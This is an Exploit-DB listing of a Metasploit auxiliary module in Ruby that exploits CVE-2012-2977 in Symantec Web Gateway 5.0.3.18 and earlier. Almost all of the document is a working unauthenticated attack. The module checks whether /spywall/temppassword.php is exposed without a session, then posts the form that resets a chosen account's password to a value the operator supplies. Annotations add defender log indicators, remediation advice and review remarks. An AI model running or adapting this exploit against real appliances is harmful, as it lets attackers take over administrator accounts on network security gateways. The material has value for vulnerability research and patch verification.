Symantec Web Gateway 5.0.3.18 – Arbitrary Password Change (Metasploit)

  • 作者: Kc57
    日期: 2012-08-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/20706/
  • ##
    # @_Kc57
    # Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
    ##
    
    require 'msf/core'
    
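    # Auxiliary module for CVE-2012-2977 (Symantec Web Gateway <= 5.0.3.18).
    #
    # What the code shows: /spywall/temppassword.php is requested, and its
    # password-change form is submitted, without the module sending any
    # credentials or session cookie. A vulnerable appliance serves the form
    # instead of redirecting to the login page.
    #
    # Defender notes: in the appliance's web logs, look for requests to
    # /spywall/temppassword.php from clients with no prior authenticated
    # session, especially POSTs carrying USERNAME/password/password2.
    # Remediation is to upgrade past the affected release and to keep the
    # management interface reachable only from trusted networks.
    class Metasploit3 < Msf::Auxiliary
    
    	include Msf::Exploit::Remote::HttpClient
    
    	# Registers the module metadata and its options.
    	#
    	# Options: RPORT (default 80), USER (account whose password is changed)
    	# and PASSWORD (the new value), both defaulting to 'admin'.
    	def initialize(info={})
    		super(update_info(info,
    			'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
    			'Description'=> %q{
    					This module will change the password for the specified account on a Symantec Web Gatewaye server.
    			},
    			'License'=> MSF_LICENSE,
    			'Version'=> "$Revision: 0 $",
    			'Author' =>
    				[
    					'Kc57',
    				],
    			'References' =>
    				[
    					[ 'CVE', '2012-2977' ],
    					# NOTE(review): '0' looks like a placeholder, not a real OSVDB id.
    					[ 'OSVDB', '0' ],
    					[ 'BID', '54430' ],
    					[ 'URL', 'https://www.securityfocus.com/bid/54430' ],
    				],
    			'DisclosureDate' => "Jul 23 2012" ))
    
    		register_options(
    			[
    				Opt::RPORT(80),
    				# The original help text for USER was a copy of the PASSWORD text.
    				OptString.new('USER', [ true, 'The account whose password will be reset', 'admin']),
    				OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
    			], self.class)
    	end
    
    	# Probes temppassword.php, then submits the password-change form.
    	#
    	# Returns early (after printing an error) when no response arrives, when
    	# the probe is not answered with HTTP 200, or when the returned page is
    	# not the password-change form.
    	def run
    
    		# NOTE(review): the message hard-codes "https://" while the default
    		# RPORT registered above is 80; the scheme shown may not match the
    		# connection actually made.
    		print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
    		res = send_request_raw(
    		{
    			'method'=> 'POST',
    			'uri' => '/spywall/temppassword.php',
    		}, 25)
    
    		# No response (connection failure or timeout) yields nil; without this
    		# guard the res.code call below raises NoMethodError.
    		if res.nil?
    			print_error("No response received from #{rhost}. Exiting!")
    			return
    		end
    
    		# Check to see if we get HTTP OK
    		if (res.code == 200)
    			print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
    		else
    			print_error("Did not get HTTP 200, URL was not found. Exiting!")
    			return
    		end
    
    		# Check whether the temppassword.php page loads or we are redirected
    		# to the login page. Being served the form without a session is the
    		# vulnerable condition.
    		if (res.body.match(/Please Select a New Password/i))
    			print_status("Server is vulnerable!")
    		else
    			print_error("Target doesn't seem to be vulnerable!")
    			return
    		end
    
    		print_status("Attempting to exploit password change vulnerability on #{rhost}")
    		# NOTE(review): this writes the chosen password in clear text to the
    		# console, and so to any console log or spool file.
    		print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")
    
    		# Form fields of the password-change page.
    		data= 'target=executive_summary.php'
    		data << '&USERNAME=' + datastore['USER']
    		data << '&password=' + datastore['PASSWORD']
    		data << '&password2=' + datastore['PASSWORD']
    		data << '&Save=Save'
    
    		res = send_request_cgi(
    		{
    			'method'=> 'POST',
    			'uri' => '/spywall/temppassword.php',
    			'data'=> data,
    		}, 25)
    
    		# A nil response (no reply) is reported as a failed reset instead of
    		# raising NoMethodError on res.code.
    		if res && res.code == 200
    			if (res.body.match(/Thank you/i))
    				print_status("Password reset was successful!\n")
    			else
    				print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
    			end
    		else
    			print_error("Password reset failed!")
    		end
    	end
    
    end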